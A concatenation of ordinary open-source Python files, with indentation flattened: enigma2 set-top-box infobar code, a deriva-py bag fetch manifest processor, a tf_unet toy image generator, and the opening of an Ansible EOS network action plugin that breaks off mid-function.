self.resume_point = last
l = last / 90000
if "ask" in config.usage.on_movie_start.value or not length[1]:
Notifications.AddNotificationWithCallback(self.playLastCB, MessageBox, _("Do you want to resume this playback?") + "\n" + (_("Resume position at %s") % ("%d:%02d:%02d" % (l/3600, l%3600/60, l%60))), timeout=30, default="yes" in config.usage.on_movie_start.value)
elif config.usage.on_movie_start.value == "resume":
Notifications.AddNotificationWithCallback(self.playLastCB, MessageBox, _("Resuming playback"), timeout=2, type=MessageBox.TYPE_INFO)
def playLastCB(self, answer):
if answer == True and self.resume_point:
self.doSeek(self.resume_point)
self.hideAfterResume()
def hideAfterResume(self):
if isinstance(self, InfoBarShowHide):
self.hide()
def __getSeekable(self):
service = self.session.nav.getCurrentService()
if service is None:
return None
return service.seek()
def cueGetCurrentPosition(self):
seek = self.__getSeekable()
if seek is None:
return None
r = seek.getPlayPosition()
if r[0]:
return None
return long(r[1])
def cueGetEndCutPosition(self):
ret = False
isin = True
for cp in self.cut_list:
if cp[1] == self.CUT_TYPE_OUT:
if isin:
isin = False
ret = cp[0]
elif cp[1] == self.CUT_TYPE_IN:
isin = True
return ret
def jumpPreviousNextMark(self, cmp, start=False):
current_pos = self.cueGetCurrentPosition()
if current_pos is None:
return False
mark = self.getNearestCutPoint(current_pos, cmp=cmp, start=start)
if mark is not None:
pts = mark[0]
else:
return False
self.doSeek(pts)
return True
def jumpPreviousMark(self):
# we add 5 seconds, so if the play position is <5s after
# the mark, the mark before will be used
self.jumpPreviousNextMark(lambda x: -x-5*90000, start=True)
def jumpNextMark(self):
if not self.jumpPreviousNextMark(lambda x: x-90000):
self.doSeek(-1)
def getNearestCutPoint(self, pts, cmp=abs, start=False):
# can be optimized
beforecut = True
nearest = None
bestdiff = -1
instate = True
if start:
bestdiff = cmp(0 - pts)
if bestdiff >= 0:
nearest = [0, False]
for cp in self.cut_list:
if beforecut and cp[1] in (self.CUT_TYPE_IN, self.CUT_TYPE_OUT):
beforecut = False
if cp[1] == self.CUT_TYPE_IN: # Start is here, disregard previous marks
diff = cmp(cp[0] - pts)
if start and diff >= 0:
nearest = cp
bestdiff = diff
else:
nearest = None
bestdiff = -1
if cp[1] == self.CUT_TYPE_IN:
instate = True
elif cp[1] == self.CUT_TYPE_OUT:
instate = False
elif cp[1] in (self.CUT_TYPE_MARK, self.CUT_TYPE_LAST):
diff = cmp(cp[0] - pts)
if instate and diff >= 0 and (nearest is None or bestdiff > diff):
nearest = cp
bestdiff = diff
return nearest
def toggleMark(self, onlyremove=False, onlyadd=False, tolerance=5*90000, onlyreturn=False):
current_pos = self.cueGetCurrentPosition()
if current_pos is None:
# print "not seekable"
return
nearest_cutpoint = self.getNearestCutPoint(current_pos)
if nearest_cutpoint is not None and abs(nearest_cutpoint[0] - current_pos) < tolerance:
if onlyreturn:
return nearest_cutpoint
if not onlyadd:
self.removeMark(nearest_cutpoint)
elif not onlyremove and not onlyreturn:
self.addMark((current_pos, self.CUT_TYPE_MARK))
if onlyreturn:
return None
def addMark(self, point):
insort(self.cut_list, point)
self.uploadCuesheet()
self.showAfterCuesheetOperation()
def removeMark(self, point):
self.cut_list.remove(point)
self.uploadCuesheet()
self.showAfterCuesheetOperation()
def showAfterCuesheetOperation(self):
if isinstance(self, InfoBarShowHide):
self.doShow()
def __getCuesheet(self):
service = self.session.nav.getCurrentService()
if service is None:
return None
return service.cueSheet()
def uploadCuesheet(self):
cue = self.__getCuesheet()
if cue is None:
# print "upload failed, no cuesheet interface"
return
cue.setCutList(self.cut_list)
def downloadCuesheet(self):
cue = self.__getCuesheet()
if cue is None:
# print "download failed, no cuesheet interface"
self.cut_list = [ ]
else:
self.cut_list = cue.getCutList()
class InfoBarSummary(Screen):
skin = """
<screen position="0,0" size="132,64">
<widget source="global.CurrentTime" render="Label" position="62,46" size="82,18" font="Regular;16" >
<convert type="ClockToText">WithSeconds</convert>
</widget>
<widget source="session.RecordState" render="FixedLabel" text=" " position="62,46" size="82,18" zPosition="1" >
<convert type="ConfigEntryTest">config.usage.blinking_display_clock_during_recording,True,CheckSourceBoolean</convert>
<convert type="ConditionalShowHide">Blink</convert>
</widget>
<widget source="session.CurrentService" render="Label" position="6,4" size="120,42" font="Regular;18" >
<convert type="ServiceName">Name</convert>
</widget>
<widget source="session.Event_Now" render="Progress" position="6,46" size="46,18" borderWidth="1" >
<convert type="EventTime">Progress</convert>
</widget>
</screen>"""
# for picon: (path="piconlcd" will use LCD picons)
# <widget source="session.CurrentService" render="Picon" position="6,0" size="120,64" path="piconlcd" >
# <convert type="ServiceName">Reference</convert>
# </widget>
class InfoBarSummarySupport:
def __init__(self):
pass
def createSummary(self):
return InfoBarSummary
class InfoBarMoviePlayerSummary(Screen):
skin = """
<screen position="0,0" size="132,64">
<widget source="global.CurrentTime" render="Label" position="62,46" size="64,18" font="Regular;16" halign="right" >
<convert type="ClockToText">WithSeconds</convert>
</widget>
<widget source="session.RecordState" render="FixedLabel" text=" " position="62,46" size="64,18" zPosition="1" >
<convert type="ConfigEntryTest">config.usage.blinking_display_clock_during_recording,True,CheckSourceBoolean</convert>
<convert type="ConditionalShowHide">Blink</convert>
</widget>
<widget source="session.CurrentService" render="Label" position="6,4" size="120,42" font="Regular;18" >
<convert type="ServiceName">Name</convert>
</widget>
<widget source="session.CurrentService" render="Progress" position="6,46" size="56,18" borderWidth="1" >
<convert type="ServicePosition">Position</convert>
</widget>
</screen>"""
def __init__(self, session, parent):
Screen.__init__(self, session, parent = parent)
self["state_summary"] = StaticText("")
self["speed_summary"] = StaticText("")
self["statusicon_summary"] = MultiPixmap()
self.onShow.append(self.addWatcher)
self.onHide.append(self.removeWatcher)
def addWatcher(self):
self.parent.onChangedEntry.append(self.selectionChanged)
def removeWatcher(self):
self.parent.onChangedEntry.remove(self.selectionChanged)
def selectionChanged(self, state_summary, speed_summary, statusicon_summary):
self["state_summary"].setText(state_summary)
self["speed_summary"].setText(speed_summary)
self["statusicon_summary"].setPixmapNum(int(statusicon_summary))
class InfoBarMoviePlayerSummarySupport:
def __init__(self):
pass
def createSummary(self):
return InfoBarMoviePlayerSummary
class InfoBarTeletextPlugin:
def __init__(self):
self.teletext_plugin = None
for p in plugins.getPlugins(PluginDescriptor.WHERE_TELETEXT):
self.teletext_plugin = p
if self.teletext_plugin is not None:
self["TeletextActions"] = HelpableActionMap(self, "InfobarTeletextActions",
{
"startTeletext": (self.startTeletext, _("View teletext..."))
})
else:
print "no teletext plugin found!"
def startTeletext(self):
self.teletext_plugin and self.teletext_plugin(session=self.session, service=self.session.nav.getCurrentService())
class InfoBarSubtitleSupport(object):
def __init__(self):
object.__init__(self)
self["SubtitleSelectionAction"] = HelpableActionMap(self, "InfobarSubtitleSelectionActions",
{
"subtitleSelection": (self.subtitleSelection, _("Subtitle selection...")),
})
self.selected_subtitle = None
if isStandardInfoBar(self):
self.subtitle_window = self.session.instantiateDialog(SubtitleDisplay)
self.subtitle_window.setAnimationMode(0)
else:
from Screens.InfoBar import InfoBar
self.subtitle_window = InfoBar.instance.subtitle_window
self.subtitle_window.hide()
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evStart: self.__serviceChanged,
iPlayableService.evEnd: self.__serviceChanged,
iPlayableService.evUpdatedInfo: self.__updatedInfo
})
def getCurrentServiceSubtitle(self):
service = self.session.nav.getCurrentService()
return service and service.subtitle()
def subtitleSelection(self):
service = self.session.nav.getCurrentService()
subtitle = service and service.subtitle()
subtitlelist = subtitle and subtitle.getSubtitleList()
if self.selected_subtitle or subtitlelist and len(subtitlelist)>0:
from Screens.AudioSelection import SubtitleSelection
self.session.open(SubtitleSelection, self)
else:
return 0
def doCenterDVBSubs(self):
service = self.session.nav.getCurrentlyPlayingServiceReference()
servicepath = service and service.getPath()
if servicepath and servicepath.startswith("/"):
if service.toString().startswith("1:"):
info = eServiceCenter.getInstance().info(service)
service = info and info.getInfoString(service, iServiceInformation.sServiceref)
config.subtitles.dvb_subtitles_centered.value = service and eDVBDB.getInstance().getFlag(eServiceReference(service)) & self.FLAG_CENTER_DVB_SUBS and True
return
service = self.session.nav.getCurrentService()
info = service and service.info()
config.subtitles.dvb_subtitles_centered.value = info and info.getInfo(iServiceInformation.sCenterDVBSubs) and True
def __serviceChanged(self):
if self.selected_subtitle:
self.selected_subtitle = None
self.subtitle_window.hide()
def __updatedInfo(self):
if not self.selected_subtitle:
subtitle = self.getCurrentServiceSubtitle()
cachedsubtitle = subtitle.getCachedSubtitle()
if cachedsubtitle:
self.enableSubtitle(cachedsubtitle)
self.doCenterDVBSubs()
def enableSubtitle(self, selectedSubtitle):
subtitle = self.getCurrentServiceSubtitle()
self.selected_subtitle = selectedSubtitle
if subtitle and self.selected_subtitle:
subtitle.enableSubtitles(self.subtitle_window.instance, self.selected_subtitle)
self.subtitle_window.show()
self.doCenterDVBSubs()
else:
if subtitle:
subtitle.disableSubtitles(self.subtitle_window.instance)
self.subtitle_window.hide()
def restartSubtitle(self):
if self.selected_subtitle:
self.enableSubtitle(self.selected_subtitle)
class InfoBarServiceErrorPopupSupport:
def __init__(self):
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evTuneFailed: self.__tuneFailed,
iPlayableService.evTunedIn: self.__serviceStarted,
iPlayableService.evStart: self.__serviceStarted
})
self.__serviceStarted()
def __serviceStarted(self):
self.closeNotificationInstantiateDialog()
self.last_error = None
Notifications.RemovePopup(id = "ZapError")
def __tuneFailed(self):
if not config.usage.hide_zap_errors.value or not config.usage.remote_fallback_enabled.value:
service = self.session.nav.getCurrentService()
info = service and service.info()
error = info and info.getInfo(iServiceInformation.sDVBState)
if not config.usage.remote_fallback_enabled.value and (error == eDVBServicePMTHandler.eventMisconfiguration or error == eDVBServicePMTHandler.eventNoResources):
self.session.nav.currentlyPlayingServiceReference = None
self.session.nav.currentlyPlayingServiceOrGroup = None
if error == self.last_error:
error = None
else:
self.last_error = error
error = {
eDVBServicePMTHandler.eventNoResources: _("No free tuner!"),
eDVBServicePMTHandler.eventTuneFailed: _("Tune failed!"),
eDVBServicePMTHandler.eventNoPAT: _("No data on transponder!\n(Timeout reading PAT)"),
eDVBServicePMTHandler.eventNoPATEntry: _("Service not found!\n(SID not found in PAT)"),
eDVBServicePMTHandler.eventNoPMT: _("Service invalid!\n(Timeout reading PMT)"),
eDVBServicePMTHandler.eventNewProgramInfo: None,
eDVBServicePMTHandler.eventTuned: None,
eDVBServicePMTHandler.eventSOF: None,
eDVBServicePMTHandler.eventEOF: None,
eDVBServicePMTHandler.eventMisconfiguration: _("Service unavailable!\nCheck tuner configuration!"),
}.get(error) #this returns None when the key not exist in the dict
if error and not config.usage.hide_zap_errors.value:
self.closeNotificationInstantiateDialog()
if hasattr(self, "dishDialog") and not self.dishDialog.dishState():
Notifications.AddPopup(text = error, type = MessageBox.TYPE_ERROR, timeout = 5, id = "ZapError")
class InfoBarZoom:
def __init__(self):
self.zoomrate=0
self.zoomin=1
self["ZoomActions"] = HelpableActionMap(self, "InfobarZoomActions",
{
"ZoomInOut":(self.ZoomInOut, _("Zoom In/Out TV...")),
"ZoomOff":(self.ZoomOff, _("Zoom Off...")),
}, prio=2)
def ZoomInOut(self):
zoomval=0
if self.zoomrate > 3:
self.zoomin = 0
elif self.zoomrate < -9:
self.zoomin = 1
if self.zoomin == 1:
self.zoomrate += 1
else:
self.zoomrate -= 1
if self.zoomrate < 0:
zoomval=abs(self.zoomrate)+10
else:
zoomval=self.zoomrate
# print "zoomRate:", self.zoomrate
# print "zoomval:", zoomval
file = open("/proc/stb/vmpeg/0/zoomrate", "w")
file.write('%d' % int(zoomval))
file.close()
def ZoomOff(self):
self.zoomrate = 0
self.zoomin = 1
f = open("/proc/stb/vmpeg/0/zoomrate", "w")
f.write(str(0))
f.close()
class InfoBarHdmi:
def __init__(self):
self.hdmi_enabled = False
self.hdmi_enabled_full = False
self.hdmi_enabled_pip = False
if getMachineBuild() in ('inihdp', 'hd2400', 'dm7080', 'dm820', 'dm900', 'dm920', 'gb7252', 'vuultimo4k','et13000','sf5008'):
if not self.hdmi_enabled_full:
self.addExtension((self.getHDMIInFullScreen, self.HDMIInFull, lambda: True), "blue")
if not self.hdmi_enabled_pip:
self.addExtension((self.getHDMIInPiPScreen, self.HDMIInPiP, lambda: True), "green")
self["HDMIActions"] = HelpableActionMap(self, "InfobarHDMIActions",
{
"HDMIin":(self.HDMIIn, _("Switch to HDMI in mode")),
"HDMIinLong":(self.HDMIInLong, _("Switch to HDMI in mode")),
}, prio=2)
def HDMIInLong(self):
if self.LongButtonPressed:
if not hasattr(self.session, 'pip') and not self.session.pipshown:
self.session.pip = self.session.instantiateDialog(PictureInPicture)
self.session.pip.playService(eServiceReference('8192:0:1:0:0:0:0:0:0:0:'))
self.session.pip.show()
self.session.pipshown = True
self.session.pip.servicePath = self.servicelist.getCurrentServicePath()
else:
curref = self.session.pip.getCurrentService()
if curref and curref.type != 8192:
self.session.pip.playService(eServiceReference('8192:0:1:0:0:0:0:0:0:0:'))
self.session.pip.servicePath = self.servicelist.getCurrentServicePath()
else:
self.session.pipshown = False
del self.session.pip
def HDMIIn(self):
if not self.LongButtonPressed:
slist = self.servicelist
curref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if curref and curref.type != 8192:
self.session.nav.playService(eServiceReference('8192:0:1:0:0:0:0:0:0:0:'))
else:
self.session.nav.playService(slist.servicelist.getCurrent())
def getHDMIInFullScreen(self):
if not self.hdmi_enabled_full:
return _("Turn on HDMI-IN Full screen mode")
else:
return _("Turn off HDMI-IN Full screen mode")
def getHDMIInPiPScreen(self):
if not self.hdmi_enabled_pip:
return _("Turn on HDMI-IN PiP mode")
else:
return _("Turn off HDMI-IN PiP mode")
def HDMIInPiP(self):
if getMachineBuild() in ('dm7080', 'dm820', 'dm900', 'dm920'):
f=open("/proc/stb/hdmi-rx/0/hdmi_rx_monitor","r")
check=f.read()
f.close()
if check.startswith("off"):
f=open("/proc/stb/audio/hdmi_rx_monitor","w")
f.write("on")
f.close()
f=open("/proc/stb/hdmi-rx/0/hdmi_rx_monitor","w")
f.write("on")
f.close()
else:
f=open("/proc/stb/audio/hdmi_rx_monitor","w")
f.write("off")
f.close()
f=open("/proc/stb/hdmi-rx/0/hdmi_rx_monitor","w")
f.write("off")
f.close()
else:
if not hasattr(self.session, 'pip') and not self.session.pipshown:
self.hdmi_enabled_pip = True
self.session.pip = self.session.instantiateDialog(PictureInPicture)
self.session.pip.playService(eServiceReference('8192:0:1:0:0:0:0:0:0:0:'))
self.session.pip.show()
self.session.pipshown = True
self.session.pip.servicePath = self.servicelist.getCurrentServicePath()
else:
curref = self.session.pip.getCurrentService()
if curref and curref.type != 8192:
self.hdmi_enabled_pip = True
self.session.pip.playService(eServiceReference('8192:0:1:0:0:0:0:0:0:0:'))
self.session.pip.servicePath = self.servicelist.getCurrentServicePath()
else:
self.hdmi_enabled_pip = False
self.session.pipshown = False
del self.session.pip
def HDMIInFull(self):
if getMachineBuild() in ('dm7080', 'dm820', 'dm900', 'dm920'):
f=open("/proc/stb/hdmi-rx/0/hdmi_rx_monitor","r")
check=f.read()
f.close()
if check.startswith("off"):
f=open("/proc/stb/video/videomode","r")
self.oldvideomode=f.read()
f.close()
f=open("/proc/stb/video/videomode_50hz","r")
self.oldvideomode_50hz=f.read()
f.close()
f=open("/proc/stb/video/videomode_60hz","r")
self.oldvideomode_60hz=f.read()
f.close()
f=open("/proc/stb/video/videomode","w")
if getMachineBuild() in ('dm900', 'dm920'):
f.write("1080p")
else:
f.write("720p")
f.close()
f=open("/proc/stb/audio/hdmi_rx_monitor","w")
f.write("on")
f.close()
f=open("/proc/stb/hdmi-rx/0/hdmi_rx_monitor","w")
f.write("on")
f.close()
else:
f=open("/proc/stb/audio/hdmi_rx_monitor","w")
f.write("off")
f.close()
f=open("/proc/stb/hdmi-rx/0/hdmi_rx_monitor","w")
f.write("off")
f.close()
f=open("/proc/stb/video/videomode","w")
f.write(self.oldvideomode)
f.close()
f=open("/proc/stb/video/videomode_50hz","w")
f.write(self.oldvideomode_50hz)
f.close()
f=open("/proc/stb/video/videomode_60hz","w")
f.write(self.oldvideomode_60hz)
f.close()
else:
slist = self.servicelist
curref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if curref and curref.type != 8192:
self.hdmi_enabled_full = True
self.session.nav.playService(eServiceReference('8192:0:1:0:0:0:0:0:0:0:'))
else:
self.hdmi_enabled_full = False
self.session.nav.playService(slist.servicelist.getCurrent())
class InfoBarSleepTimer:
def __init__(self):
self.sleepTimer = eTimer()
self.sleepStartTime = 0
self.sleepTimer.callback.append(self.sleepTimerTimeout)
def sleepTimerState(self):
if self.sleepTimer.isActive():
return (self.sleepStartTime - time()) / 60
return 0
def setSleepTimer(self, sleepTime, showMessage = True):
print "[InfoBarSleepTimer] set sleeptimer", sleepTime
if sleepTime:
m = abs(sleepTime / 60)
message = _("The sleep timer has been activated.") + "\n" + _("Delay:") + " " + _("%d minutes") % m
self.sleepTimer.startLongTimer(sleepTime)
self.sleepStartTime = time() + sleepTime
else:
message = _("The sleep timer has been disabled.")
self.sleepTimer.stop()
if showMessage:
Notifications.AddPopup(message, type = MessageBox.TYPE_INFO, timeout = 5)
def sleepTimerTimeout(self):
if config.usage.sleep_timer_action.value != "standby":
isRecordTime = abs(self.session.nav.RecordTimer.getNextRecordingTime() - time()) <= 900 or self.session.nav.RecordTimer.getStillRecording() or abs(self.session.nav.RecordTimer.getNextZapTime() - time()) <= 900
isPowerTime = abs(self.session.nav.PowerTimer.getNextPowerManagerTime() - time()) <= 900 or self.session.nav.PowerTimer.isProcessing(exceptTimer = 0)
if isRecordTime or isPowerTime:
self.setSleepTimer(1800, False)
if not Screens.Standby.inStandby:
message = _("A Recording, RecordTimer or PowerTimer is running or begins in 15 minutes.\nExtend sleep timer 30 minutes. Your %s %s\nwill shut down after Recording or Powertimer event. Get in Standby now?") % (getMachineBrand(), getMachineName())
self.session.openWithCallback(self.goStandby, MessageBox, message, MessageBox.TYPE_YESNO, timeout=180, default=True)
return
if not Screens.Standby.inStandby:
list = [ (_("Yes"), True),
(_("No"), False),
(_("Extend"), "extend") ]
if config.usage.sleep_timer_action.value == "standby":
message = _("A sleep timer wants to set your %s %s to standby.\nDo that now or set extend additional minutes?") % (getMachineBrand(), getMachineName())
else:
message = _("A sleep timer wants to shut down your %s %s.\nDo that now or set extend additional minutes?") % (getMachineBrand(), getMachineName())
self.session.openWithCallback(self.sleepTimerTimeoutCallback, MessageBox, message, timeout=180, simple=True, list=list, default=True)
else:
self.goStandby()
def sleepTimerTimeoutCallback(self, answer):
if answer == "extend":
from Screens.SleepTimerEdit import SleepTimerEdit
self.session.open(SleepTimerEdit)
elif answer:
self.goStandby()
else:
self.setSleepTimer(0)
def goStandby(self, answer = None):
if config.usage.sleep_timer_action.value == "standby" or answer:
if not Screens.Standby.inStandby:
print "[InfoBarSleepTimer] goto standby"
self.session.open(Screens.Standby.Standby)
elif answer is None:
if not Screens.Standby.inStandby:
if not Screens.Standby.inTryQuitMainloop:
print "[InfoBarSleepTimer] goto deep standby"
self.session.open(Screens.Standby.TryQuitMainloop, 1)
else:
print "[InfoBarSleepTimer] goto deep standby"
quitMainloop(1)
#########################################################################################
# for displayed power or record timer messages in foreground and for callback execution #
#########################################################################################
class InfoBarOpenOnTopHelper:
def __init__(self):
pass
def openInfoBarMessage(self, message, messageboxtyp, timeout=-1):
try:
self.session.open(MessageBox, message, messageboxtyp, timeout=timeout)
except Exception, e:
print "[InfoBarOpenMessage] Exception:", e
def openInfoBarMessageWithCallback(self, callback, message, messageboxtyp, timeout=-1, default=True):
try:
self.session.openWithCallback(callback, MessageBox, message, messageboxtyp, timeout=timeout, default=default)
except Exception, e:
print "[openInfoBarMessageWithCallback] Exception:", e
def openInfoBarSession(self, session, option=None):
try:
if option is None:
self.session.open(session)
else:
self.session.open(session, option)
except Exception, e:
print "[openInfoBarSession] Exception:", e
#########################################################################################
| formiano/enigma2 | lib/python/Screens/InfoBarGenerics.py | Python | gpl-2.0 | 185,032 |
import os
import json
import uuid
import logging
import requests
from bdbag import bdbag_ro as ro
from deriva.core import format_exception
from deriva.core.utils.hash_utils import decodeBase64toHex
from deriva.core.utils.mime_utils import parse_content_disposition
from deriva.transfer.download.processors.query.base_query_processor import BaseQueryProcessor, LOCAL_PATH_KEY
from deriva.transfer.download import DerivaDownloadError, DerivaDownloadConfigurationError
class BagFetchQueryProcessor(BaseQueryProcessor):
def __init__(self, envars=None, **kwargs):
super(BagFetchQueryProcessor, self).__init__(envars, **kwargs)
self.content_type = "application/x-json-stream"
filename = ''.join(['fetch-manifest_', str(uuid.uuid4()), ".json"])
self.output_relpath, self.output_abspath = self.create_paths(self.base_path, filename=filename)
self.ro_file_provenance = False
def process(self):
super(BagFetchQueryProcessor, self).process()
rfm_relpath, rfm_abspath = self.createRemoteFileManifest()
if rfm_relpath and rfm_abspath:
self.outputs.update({rfm_relpath: {LOCAL_PATH_KEY: rfm_abspath}} if not self.is_bag else {})
return self.outputs
def createRemoteFileManifest(self):
logging.info("Creating remote file manifest from results of query: %s" % self.query)
input_manifest = self.output_abspath
remote_file_manifest = self.kwargs.get("remote_file_manifest")
if not os.path.isfile(input_manifest):
return None, None
with open(input_manifest, "r", encoding="utf-8") as in_file, \
open(remote_file_manifest, "a", encoding="utf-8") as remote_file:
for line in in_file:
# get the required bdbag remote file manifest vars from each line of the json-stream input file
entry = json.loads(line)
entry = self.createManifestEntry(entry)
if not entry:
continue
remote_file.write(json.dumps(entry) + "\n")
if self.ro_manifest:
ro.add_file_metadata(self.ro_manifest,
source_url=entry["url"],
media_type=entry.get("content_type"),
bundled_as=ro.make_bundled_as(
folder=os.path.dirname(entry["filename"]),
filename=os.path.basename(entry["filename"])))
os.remove(input_manifest)
return os.path.relpath(remote_file_manifest, self.base_path), os.path.abspath(remote_file_manifest)
def createManifestEntry(self, entry):
manifest_entry = dict()
url = entry.get("url")
if not url:
logging.warning(
"Skipping a record due to missing required attribute \"url\" in fetch manifest entry %s" %
json.dumps(entry))
return
ext_url = self.getExternalUrl(url)
length = entry.get("length")
md5 = entry.get("md5")
sha256 = entry.get("sha256")
filename = entry.get("filename") if not self.output_filename else self.output_filename
content_type = entry.get("content_type")
content_disposition = None
# if any required fields are missing from the query result, attempt to get them from the remote server by
# issuing a HEAD request against the supplied URL
if not (length and (md5 or sha256)):
try:
headers = self.headForHeaders(url, raise_for_status=True)
except requests.HTTPError as e:
raise DerivaDownloadError("Exception during HEAD request: %s" % format_exception(e))
length = headers.get("Content-Length")
content_type = headers.get("Content-Type")
content_disposition = headers.get("Content-Disposition")
if not md5:
md5 = headers.get("Content-MD5")
if md5:
md5 = decodeBase64toHex(md5)
if not sha256:
sha256 = headers.get("Content-SHA256")
if sha256:
sha256 = decodeBase64toHex(sha256)
# if content length or both hash values are missing, it is a fatal error
if length is None:
raise DerivaDownloadError("Could not determine Content-Length for %s" % ext_url)
if not (md5 or sha256):
raise DerivaDownloadError("Could not locate an MD5 or SHA256 hash for %s" % ext_url)
# if a local filename is not provided, try to construct one using content_disposition, if available
if not filename:
filename = os.path.basename(url).split(":")[0] if not content_disposition else \
parse_content_disposition(content_disposition)
env = self.envars.copy()
env.update(entry)
output_path, _ = self.create_paths(self.base_path,
sub_path=self.sub_path,
filename=filename,
is_bag=self.is_bag,
envars=env)
manifest_entry['url'] = ext_url
manifest_entry['length'] = int(length)
manifest_entry['filename'] = output_path
if md5:
manifest_entry['md5'] = md5
if sha256:
manifest_entry['sha256'] = sha256
if content_type:
manifest_entry["content_type"] = content_type
return manifest_entry
| informatics-isi-edu/deriva-py | deriva/transfer/download/processors/query/bag_fetch_query_processor.py | Python | apache-2.0 | 5,645 |
# tf_unet is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# tf_unet is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with tf_unet. If not, see <http://www.gnu.org/licenses/>.
'''
Toy example, generates images at random that can be used for training
Created on Jul 28, 2016
author: jakeret
'''
from __future__ import print_function, division, absolute_import, unicode_literals
import numpy as np
from tf_unet.image_util import BaseDataProvider
class GrayScaleDataProvider(BaseDataProvider):
channels = 1
n_class = 1
def __init__(self, nx, ny, **kwargs):
super(GrayScaleDataProvider, self).__init__()
self.nx = nx
self.ny = ny
self.kwargs = kwargs
rect = kwargs.get("rectangles", False)
if rect:
self.n_class=3
def _next_data(self):
image, label = create_image_and_label(self.nx, self.ny, **self.kwargs)
# print(image.shape)
# print(label.shape)
return image,label
# return create_image_and_label(self.nx, self.ny, **self.kwargs)
class RgbDataProvider(BaseDataProvider):
channels = 3
n_class = 2
def __init__(self, nx, ny, **kwargs):
super(RgbDataProvider, self).__init__()
self.nx = nx
self.ny = ny
self.kwargs = kwargs
rect = kwargs.get("rectangles", False)
if rect:
self.n_class=3
def _next_data(self):
data, label = create_image_and_label(self.nx, self.ny, **self.kwargs)
return to_rgb(data), label
def create_image_and_label(nx,ny, cnt = 2, r_min = 2, r_max = 8, border = 0, sigma = 1, rectangles=False):
image = np.ones((nx, ny, 1))
label = np.zeros((nx, ny, 3), dtype=np.float32)
mask = np.zeros((nx, ny), dtype=np.bool)
for _ in range(cnt):
a = np.random.randint(border, nx-border)
b = np.random.randint(border, ny-border)
r = np.random.randint(r_min, r_max)
h = np.random.randint(1,255)
y,x = np.ogrid[-a:nx-a, -b:ny-b]
m = x*x + y*y <= r*r
mask = np.logical_or(mask, m)
image[m] = h
# print(mask.shape)
label[mask, 1] = 1
if rectangles:
mask = np.zeros((nx, ny), dtype=np.bool)
for _ in range(cnt//2):
a = np.random.randint(nx)
b = np.random.randint(ny)
r = np.random.randint(r_min, r_max)
h = np.random.randint(1,255)
m = np.zeros((nx, ny), dtype=np.bool)
m[a:a+r, b:b+r] = True
mask = np.logical_or(mask, m)
image[m] = h
label[mask, 2] = 1
label[..., 0] = ~(np.logical_or(label[...,1], label[...,2]))
image += np.random.normal(scale=sigma, size=image.shape)
image -= np.amin(image)
image /= np.amax(image)
if rectangles:
return image, label
else:
return image, label[..., 1]
def to_rgb(img):
img = img.reshape(img.shape[0], img.shape[1])
img[np.isnan(img)] = 0
img -= np.amin(img)
img /= np.amax(img)
blue = np.clip(4*(0.75-img), 0, 1)
red = np.clip(4*(img-0.25), 0, 1)
green= np.clip(44*np.fabs(img-0.5)-1., 0, 1)
rgb = np.stack((red, green, blue), axis=2)
return rgb
| mughanibu/Deep-Learning-for-Inverse-Problems | tf_unet/image_gen.py | Python | mit | 3,652 |
#
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import sys
import copy
from ansible.plugins.action.normal import ActionModule as _ActionModule
from ansible.utils.path import unfrackpath
from ansible.plugins import connection_loader
from ansible.compat.six import iteritems
from ansible.module_utils.eos import ARGS_DEFAULT_VALUE, eos_argument_spec
from ansible.module_utils.basic import AnsibleFallbackNotFound
from ansible.module_utils._text import to_bytes
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class ActionModule(_ActionModule):
def run(self, tmp=None, task_vars=None):
if self._play_context.connection != 'local':
return dict(
failed=True,
msg='invalid connection specified, expected connection=local, '
'got %s' % self._play_context.connection
)
provider = self.load_provider()
transport = provider['transport'] or 'cli'
display.vvvv('connection transport is %s' % transport, self._play_context.remote_addr)
if transport == 'cli':
pc = copy.deepcopy(self._play_context)
pc.connection = 'network_cli'
pc.network_os = 'eos'
pc.remote_addr = provider['host'] or self._play_context.remote_addr
pc.port = provider['port'] or self._play_context.port or 22
pc.remote_user = provider['username'] or self._play_context.connection_user
pc.password = provider['password'] or self._play_context.password
pc.private_key_file = provider['ssh_keyfile'] or self._play_context.private_key_file
pc.timeout = provider['timeout'] or self._play_context.timeout
pc.become = provider['authorize'] or False
pc.become_pass = provider['auth_pass']
display.vvv('using connection plugin %s' % pc.connection, pc.remote_addr)
connection = self._shared_loader_obj.connection_loader.get('persistent', pc, sys.stdin)
socket_path = self._get_socket_path(pc)
display.vvvv('socket_path: %s' % socket_path, pc.remote_addr)
if not os.path.exists(socket_path):
# start the connection if it isn't started
rc, out, err = connection.exec_command('open_shell()')
display.vvvv('open_shell() returned %s %s %s' % (rc, out, err))
if not rc == 0:
return {'failed': True,
'msg': 'unable to open shell. Please see: ' +
'https://docs.ansible.com/ansible/network_debug_troubleshooting.html#unable-to-open-shell'}
else:
# make sure we are in the right cli context which should be
# enable mode and not config module
rc, out, err = connection.exec_command('prompt()')
while str(out).strip().endswith(')#'):
display.vvvv('wrong context, sending exit to device', self._play_context.remote_addr)
connection.exec_command('exit')
rc, out, err = connection.exec_command('prompt()')
task_vars['ansible_socket'] = socket_path
else:
provider['transport'] = 'eapi'
if provider.get('host') is None:
provider['host'] = self._play_context.remote_addr
if provider.get('use_ssl') is None:
provider['use_ssl'] = ARGS_DEFAULT_VALUE['use_ssl']
if provider.get('port') is None:
default_port = 443 if provider['use_ssl'] else 80
